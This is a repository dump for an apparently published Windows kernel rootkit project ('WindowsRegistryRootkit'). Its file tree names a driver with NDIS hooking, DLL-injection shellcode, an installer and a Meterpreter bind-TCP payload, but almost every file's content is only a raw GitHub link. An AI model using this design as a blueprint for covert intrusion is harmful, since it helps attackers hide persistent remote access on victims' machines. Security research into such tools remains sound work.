├── README.md ├── bin ├── rootkit_installer.exe ├── rootkit_installer.pdb └── rootkit_ping.py └── src ├── bin2c.exe ├── common ├── catchy32.h ├── catchy32.lib ├── common.h ├── debug.cpp ├── debug.h ├── ntdll_defs.h ├── shellcode2_struct.h └── undocnt.h ├── includes ├── meterpreter_debug.dll.h └── rootkit_driver_debug.sys.h ├── meterpreter ├── dllmain.cpp ├── meterpreter.cpp ├── meterpreter.def ├── meterpreter.vcproj ├── post_build.bat ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── meterpreter_bind_tcp.h ├── meterpreter_config.h ├── meterpreter_debug.dll ├── meterpreter_debug.pdb ├── rootkit.sln ├── rootkit_driver ├── bogusproto.cpp ├── bogusproto.h ├── debug.h ├── dll_inject.cpp ├── dll_inject.h ├── dll_inject_shellcode.h ├── ndis_hook.cpp ├── ndis_hook.h ├── network.cpp ├── network.h ├── post_build.bat ├── rootkit_driver.cpp ├── rootkit_driver.def ├── rootkit_driver.h ├── rootkit_driver.vcproj ├── runtime.cpp ├── runtime.h ├── stdafx.h └── undocnt.h ├── rootkit_driver_config.h ├── rootkit_driver_debug.pdb ├── rootkit_driver_debug.sys └── rootkit_installer ├── rootkit_installer.cpp ├── rootkit_installer.vcproj ├── stdafx.cpp ├── stdafx.h └── targetver.h /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/README.md -------------------------------------------------------------------------------- /bin/rootkit_installer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/bin/rootkit_installer.exe -------------------------------------------------------------------------------- /bin/rootkit_installer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/bin/rootkit_installer.pdb -------------------------------------------------------------------------------- /bin/rootkit_ping.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/bin/rootkit_ping.py -------------------------------------------------------------------------------- /src/bin2c.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/bin2c.exe -------------------------------------------------------------------------------- /src/common/catchy32.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/catchy32.h -------------------------------------------------------------------------------- /src/common/catchy32.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/catchy32.lib -------------------------------------------------------------------------------- /src/common/common.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/common.h -------------------------------------------------------------------------------- /src/common/debug.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/debug.cpp -------------------------------------------------------------------------------- /src/common/debug.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/debug.h -------------------------------------------------------------------------------- /src/common/ntdll_defs.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/ntdll_defs.h -------------------------------------------------------------------------------- /src/common/shellcode2_struct.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/shellcode2_struct.h -------------------------------------------------------------------------------- /src/common/undocnt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/common/undocnt.h -------------------------------------------------------------------------------- /src/includes/meterpreter_debug.dll.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/includes/meterpreter_debug.dll.h -------------------------------------------------------------------------------- /src/includes/rootkit_driver_debug.sys.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/includes/rootkit_driver_debug.sys.h -------------------------------------------------------------------------------- /src/meterpreter/dllmain.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/dllmain.cpp -------------------------------------------------------------------------------- /src/meterpreter/meterpreter.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/meterpreter.cpp -------------------------------------------------------------------------------- /src/meterpreter/meterpreter.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | Dummy -------------------------------------------------------------------------------- /src/meterpreter/meterpreter.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/meterpreter.vcproj -------------------------------------------------------------------------------- /src/meterpreter/post_build.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/post_build.bat -------------------------------------------------------------------------------- /src/meterpreter/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/stdafx.cpp -------------------------------------------------------------------------------- /src/meterpreter/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/stdafx.h -------------------------------------------------------------------------------- /src/meterpreter/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter/targetver.h -------------------------------------------------------------------------------- /src/meterpreter_bind_tcp.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter_bind_tcp.h -------------------------------------------------------------------------------- /src/meterpreter_config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter_config.h -------------------------------------------------------------------------------- /src/meterpreter_debug.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter_debug.dll -------------------------------------------------------------------------------- /src/meterpreter_debug.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/meterpreter_debug.pdb -------------------------------------------------------------------------------- /src/rootkit.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit.sln -------------------------------------------------------------------------------- /src/rootkit_driver/bogusproto.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/bogusproto.cpp -------------------------------------------------------------------------------- /src/rootkit_driver/bogusproto.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/bogusproto.h -------------------------------------------------------------------------------- /src/rootkit_driver/debug.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/debug.h -------------------------------------------------------------------------------- /src/rootkit_driver/dll_inject.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/dll_inject.cpp -------------------------------------------------------------------------------- /src/rootkit_driver/dll_inject.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/dll_inject.h -------------------------------------------------------------------------------- /src/rootkit_driver/dll_inject_shellcode.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/dll_inject_shellcode.h -------------------------------------------------------------------------------- /src/rootkit_driver/ndis_hook.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/ndis_hook.cpp -------------------------------------------------------------------------------- /src/rootkit_driver/ndis_hook.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/ndis_hook.h -------------------------------------------------------------------------------- /src/rootkit_driver/network.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/network.cpp -------------------------------------------------------------------------------- /src/rootkit_driver/network.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/network.h -------------------------------------------------------------------------------- /src/rootkit_driver/post_build.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/post_build.bat -------------------------------------------------------------------------------- /src/rootkit_driver/rootkit_driver.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/rootkit_driver.cpp -------------------------------------------------------------------------------- /src/rootkit_driver/rootkit_driver.def: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/rootkit_driver/rootkit_driver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/rootkit_driver.h -------------------------------------------------------------------------------- /src/rootkit_driver/rootkit_driver.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/rootkit_driver.vcproj -------------------------------------------------------------------------------- /src/rootkit_driver/runtime.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/runtime.cpp -------------------------------------------------------------------------------- /src/rootkit_driver/runtime.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/runtime.h -------------------------------------------------------------------------------- /src/rootkit_driver/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/stdafx.h -------------------------------------------------------------------------------- /src/rootkit_driver/undocnt.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver/undocnt.h -------------------------------------------------------------------------------- /src/rootkit_driver_config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver_config.h -------------------------------------------------------------------------------- /src/rootkit_driver_debug.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver_debug.pdb -------------------------------------------------------------------------------- /src/rootkit_driver_debug.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_driver_debug.sys -------------------------------------------------------------------------------- /src/rootkit_installer/rootkit_installer.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_installer/rootkit_installer.cpp -------------------------------------------------------------------------------- /src/rootkit_installer/rootkit_installer.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_installer/rootkit_installer.vcproj -------------------------------------------------------------------------------- /src/rootkit_installer/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_installer/stdafx.cpp -------------------------------------------------------------------------------- /src/rootkit_installer/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_installer/stdafx.h -------------------------------------------------------------------------------- /src/rootkit_installer/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cr4sh/WindowsRegistryRootkit/HEAD/src/rootkit_installer/targetver.h --------------------------------------------------------------------------------